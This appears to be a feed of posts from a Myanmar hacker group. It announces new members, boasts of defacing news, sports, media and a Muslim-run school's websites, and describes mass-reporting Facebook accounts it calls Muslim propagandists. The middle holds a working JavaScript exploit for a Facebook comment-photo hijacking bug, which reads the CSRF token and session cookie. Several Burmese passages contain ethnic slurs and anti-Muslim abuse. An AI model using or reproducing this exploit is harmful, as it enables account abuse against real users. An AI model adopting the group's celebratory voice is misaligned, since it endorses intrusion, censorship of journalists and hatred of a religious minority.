Please welcome aboard, Syd Nomád & Mr.White Hat of 3rd Gen BHG. 

We are happy to announce for new crew members (Syd Nomád & Mr.White Hat) as well as short-list members (Cyb3rw4tch3r & Blaze Fallz). Your experience and vision will be a great asset to this group, and We know that the team is looking forward to working with you.



General စာေမးပဲြ ေအာင္သူမ်ားကိုလည္း ISO 27000 Serials - Security Researcher Certificate မ်ားကိုု ေပးအပ္သြားမွာျဖစ္ပါတယ္၊ Certificate ကိုု ပိုုင္ဆိုုင္သူတုုိ ့သည္ BHG အသင္း၀င္ျဖစ္္တယ္လိုု ့ သတ္မွတ္ေပးထားျခင္း မရွိပါ၊ Security Researcher ေအာင္လက္မွတ္ကိုသာ ရယူပိုင္ဆိုင္ျခင္းသာ ျဖစ္ပါတယ္၊

Pen-testing မွာ ေအာင္ျမင္စြာ ေျဖၾကားႏုုိင္တဲ့သူမွာသာ BHG အေနျဖင့္ သတ္မွတ္ေပးထားျခင္း ခံရတာ ျဖစ္ပါတယ္၊သတ္မွတ္ခံသူမ်ားကေတာ့
Syd Nomád နဲ ့ Mr.White Hat ျဖစ္ၾကပါတယ္၊

Pen-testing မွာ technicial အေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ အခက္အခဲမ်ားစြာၾကားကေန ေျဖဆိုုၾကခဲ့ျပီး report မ်ားကိုု မိမိရသေလာက္ တင္သြင္းခဲ့ၾကေသာသူမ်ားကိုသာ BHG 3rd Gen အတြက္ ဆံုးျဖတ္ခဲ့ပါသည္၊ အဲဒီထဲမွာ အမွတ္အမ်ားဆံုုးေသာ လူမ်ားကိုု BHG အသင္းအ၀င္အျဖစ္ သတ္မွတ္ခဲ့ပါသည္၊

ေနာက္ထပ္ Submit လုပ္ခဲ့တဲ့လူမ်ားျဖစ္တဲ့ Cyb3rw4tch3r & Blaze Fallz ကိုုေတာ့ က်ေနာ္တိုု ့ short lists ထဲတြင္ ထားရွိမယ္ျဖစ္ျပီး သူတုုိ ့ရဲ ့ ေလ့လာမူမ်ား လုုပ္ေဆာင္ခ်က္မ်ားကိုု ၂ လ 3 လ အတြင္း review လုုပ္ျပီးမွသာ BHG 3nd Gen အျဖစ္သတ္မွတ္ေပးမယ္ ျဖစ္ေၾကာင္းေၾကညာအပ္ပါတယ္၊

၂၀၁၄ တြင္ BHG နဲ ့ပတ္သတ္လို ့ အခ်က္အလက္မ်ားကို BHG website သို ့မဟုတ္ ဒီ facebook တြင္သာ ေဖာ္ျပသြားပါမည္။

BHG အေနႏွင့္ BHG Member အသစ္ဘဲ ျဖစ္ျဖစ္ အေဟာင္းဘဲ ျဖစ္ members ေတြ personal အရ ဘာေတြလုပ္လုပ္ BHG ကုိယ္စားျပဳ လုပ္ေဆာင္ခ်က္ မဟုတ္ခဲ့လွ်င္ official announcement ကို Facebook or Website တြင္ ရွိမွာ မဟုတ္ပါဘူး ၊ Announcement မရွိခဲ့လွ်င္ေတာ့ BHG နဲ ့ လံုး၀ မပတ္သတ္ပါ၊



http://www.Irrawaddy.org?hacked and htttp://election-bur.irrawaddy.org?hacked got hacked by BHG. 



Ministry of Sports - www.myasoc.org got pwned.



http://www.27seagames2013.com/ got pwned.



2013 Sea Game (Myanmar) is coming soon, but some people are not behaving yet those who gotta represent for Myanmar National at 2013 Game. However Attacking players on soccer field and damaging properties are almost shameful acts at arena.

Thus, we took down their football sites who fought over sport argument instead of calm down, that caused the encouragement the audiences to make chaos and 
damaging properties at arena.

We have one real quick question, If you are going to rude at playing in your house even a small game, how are you going to host a 2013 Sea game? Last week, what happened was not looking great at all. Will you rather be shameful or respectful at 2013 Sea Game - Myanmar?

Anyhow, we threw some red cards for them, here they are :) 

PWNED http://www.naypyitawfc.com/ - RED CARD
PWNED  http://ygnutd.com/ - - RED CARD 


BTW, we added nice song (LOL Boys - Changes) for them to keep playing, so those player can learn from it about to behave as law abiding citizens:

Things won't change until we do
Things won't change until we do
Things won't change until we do
And on and on if you let me I'll show
The secrets within
There’s a hole in the morals
All you can wish for is a better tomorrow.
Things won't change until we do (X8)

And on and on if you let me I'll show
The secrets within, darker then anything
There’s a hole in the morals
All you can wish for is a better tomorrow.
Things won't change until we do (X8)

And on and on if you let me I'll show
The secrets within, darker then anything
There’s a hole in the morals
All you can wish for is a better tomorrow.
Things won't change until we do (X8)



Today Facebook rollouts for FB users to comment with picture on any status. But the feature has a bug which allows malicious user to hijack the picture from any comments if the picture is share by uploading for comment. After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture. Let's get started! all you need are status ID and victim's uploaded picture for comment ID. Once you have both, we can simply comment on any status with that uploaded picture iD with the help of little javascript or you can use tampa data (attached_photo_fbid) to post with comment picture ID. Let's see action on Failbook :)



var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted athttp://facebook.com/"+statuslinkID);

 

                                              www.mstedu.net


ၿမန္မာလူမ်ိဳးမ်ားထံမွ CEH (certified etichal hacker) သင္တနး္ သင္ေပးမည္ဟုဆိုကာ ပိုက္ဆံသိန္းခ်ီ လိမ္ညာယူေနေသာ ေခြးကုလား မြတ္စလိမ္္ ေအာင္ေဇာ္ၿမင္႔ ရဲ႕ MST Computer Center website ကို Blink Hacker Group မွ တိုက္ခိုက္လိုက္ပါတယ္။

ၿမန္မာလူမ်ိဳးမ်ားအေပၚ ေခြးကုလားမ်ား ေခါငး္ပံုၿဖတ္ေနမွဳအား BHG အဖြဲ႕မွ လက္ပိုက္ၾကည္႔ေနမည္မဟုတ္။

# We Are Myanmar , We Are The Power!

www.elevenmyanmar.com
www.thedailyeleven.com
Eleven Media Group Editor သန္းထြတ္ေအာင္ သည္ အစိုးရကိုအပုပ္ခ်တိုက္ခိုက္ ၊ ၿပည္သူလူထုကိုေစာ္ကား ၊ မီဒီယာလြပ္လပ္ခြင္႔ဟု ေအာ္ေနၿပီး Eleven Page မွာ ဆဲဆိုၿခင္းမပါပဲ အၾကံေပးေထာက္ၿပ comment  ေပးသည္ကို comment ကို ဖ်က္ၿပီး ဘန္း ေနၿခငး္သည္ မီဒီယာလြတ္လပ္ခြင႔္ေလာ?

ထို႔ေၾကာင႔္ သတိေပးသည္႔အေနၿဖင္႔ Eleven Myanamr Website နွင္႔ The Daily Eleven Website တို႔ကို တိုက္ခိုက္လိုက္ပါသည္။



http://jihadonbuddhists.org/ got fucked!

Oh wait, Jihad, go fuck yourself... here is how Mohammad got fucked, we meant it deeply... 




When Facebook don't concern about Muslims propagandists and fake accounts/pages/abusing pages on Facebook, BHG & Myanmar underground hackers stood and took down those accounts/pages last week about more than 280 accounts/pages as we promised and stand for Myanmar Nation.


Project MCA [Facebook Tangodown : Muslims Propagandists]


Facebook Rep Team, you all should aware about Muslims propagandists who were telling lies and posting nonsense about Myanmar on facebook, and you may allow such things for mistaken. You may receive massive reports on those faked accounts & pages, and their appeal letters to bring their accounts/pages back on Facebook.

Thus, facebook may allowed those douche bags, but we against it. That's why, we have taken down more than 270 accounts/pages are taken down within two days, but Facebook  failed approved after those Muslims propagandists and fake accounts owners cried out for our attacked, and approved propagandists 132 pages/accounts be back on Facebook.

Facebook, We, BHG & Myanmar Hackers take down those pages/accounts for reasons, they were the Muslims propagandists and fake accounts/pages/abusing pages on facebook and they broke ToC of Facebook. That's why we took down their pages,  and let them be down, don't bring them back after their appeal.  According to our beliefs, Facebook should concern about social standpoints, when people doesn't need to see propagandists/fake pages, Facebook should take down in the name of social respects no matter what.


you can view all lists of Muslims propagandists on Facebook at MCA page -http://108.178.54.109/mca/tango.html(Only Myanmar Version) 


However, We the BHG & Myanmar underground hackers are against the Muslim propagandists who were/are spreading trump-up stories and wrong informations about Myanmar on Facebook.